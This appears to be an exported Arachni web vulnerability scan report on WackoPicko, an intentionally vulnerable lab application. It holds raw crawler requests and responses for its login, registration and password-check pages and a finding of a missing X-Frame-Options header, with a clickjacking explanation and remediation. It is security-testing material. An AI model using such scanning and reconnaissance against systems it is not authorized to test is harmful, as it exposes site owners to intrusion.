    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
<h2>Check your password strength</h2>
<form action="/WackoPicko/passcheck.php" method="POST">
   Password to check: <br>
   <input type="password" name="password" /><br>
   <input type="submit" value="Check!" />
</form>



</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/passcheck.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=d5mejo5kr6efhtf1dlak7b04m1

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:55:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 910
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
<h2>Check your password strength</h2>
<form action="/WackoPicko/passcheck.php" method="POST">
   Password to check: <br>
   <input type="password" name="password" /><br>
   <input type="submit" value="Check!" />
</form>



</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
<form action="/WackoPicko/users/register.php" method="POST">
  <tr>
    <td>
      Username :
    </td>
    <td>
      <input type="text" name="username">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      First Name :
    </td>
    <td>
      <input type="text" name="firstname">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Last Name :
    </td>
    <td>
      <input type="text" name="lastname">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Password :
    </td>
    <td>
      <input type="password" name="password">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Password again :
    </td>
    <td>
      <input type="password" name="againpass">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      <input type="submit" value="Create Account!">
      </input>
    </td>
    <td>
      
    </td>
  </tr>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/users/register.php http://192.168.0.26/WackoPicko/users/register.php
username
firstname
lastname
password
againpass
username
firstname
lastname
password
againpass
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/register.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1082
Content-Type: text/html

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   <div class="column prepend-1 span-24 first last" >
<h2> Register for an account!</h2>
<p>
Protect yourself from hackers and <a href="/WackoPicko/passcheck.php">check your password strength</a>
</p>
<p class="span-10 error">
	 All fields are required</p>

      <table cellspacing="0" style="width:320px">
  <form action="/WackoPicko/users/register.php" method="POST">
  <tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
  <tr><td>First Name :</td><td> <input type="text" name="firstname" /></td></tr>
  <tr><td>Last Name :</td><td> <input type="text" name="lastname" /></td></tr>
  <tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
  <tr><td>Password again :</td><td> <input type="password" name="againpass" /></td></tr>
  <tr><td><input type="submit" value="Create Account!" /></td><td></td></tr>
</form>
</table>
</div>



       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/register.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1082
Content-Type: text/html

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   <div class="column prepend-1 span-24 first last" >
<h2> Register for an account!</h2>
<p>
Protect yourself from hackers and <a href="/WackoPicko/passcheck.php">check your password strength</a>
</p>
<p class="span-10 error">
	 All fields are required</p>

      <table cellspacing="0" style="width:320px">
  <form action="/WackoPicko/users/register.php" method="POST">
  <tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
  <tr><td>First Name :</td><td> <input type="text" name="firstname" /></td></tr>
  <tr><td>Last Name :</td><td> <input type="text" name="lastname" /></td></tr>
  <tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
  <tr><td>Password again :</td><td> <input type="password" name="againpass" /></td></tr>
  <tr><td><input type="submit" value="Create Account!" /></td><td></td></tr>
</form>
</table>
</div>



       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<form action="/WackoPicko/users/login.php" method="POST">
  <tr>
    <td>
      Username :
    </td>
    <td>
      <input type="text" name="username">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Password :
    </td>
    <td>
      <input type="password" name="password">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      <input type="submit" value="login">
      </input>
    </td>
    <td>
      <a href="/WackoPicko/users/register.php">
        Register
      </a>
    </td>
  </tr>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/users/login.php http://192.168.0.26/WackoPicko/users/login.php
username
password
username
password
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/login.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/users/login.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 958
Content-Type: text/html

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-23 first last">
    <h2>Login</h2>
        <table style="width:320px" cellspacing="0">
      <form action="/WackoPicko/users/login.php" method="POST">
      <tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
      <tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
      <tr><td><input type="submit" value="login" /></td><td> <a href="/WackoPicko/users/register.php">Register</a></td></tr>
   </form>
 </table>
</div>
          <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/login.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/users/login.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 958
Content-Type: text/html

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-23 first last">
    <h2>Login</h2>
        <table style="width:320px" cellspacing="0">
      <form action="/WackoPicko/users/login.php" method="POST">
      <tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
      <tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
      <tr><td><input type="submit" value="login" /></td><td> <a href="/WackoPicko/users/register.php">Register</a></td></tr>
   </form>
 </table>
</div>
          <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   

Missing 'X-Frame-Options' header 1 x_frame_options

Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

The server didn’t return an X-Frame-Options header which means that this website could be at risk of a clickjacking attack.

The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.

Remediation guidance

Configure your web server to include an X-Frame-Options header.

Proof
HTTP/1.1 200 OK
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

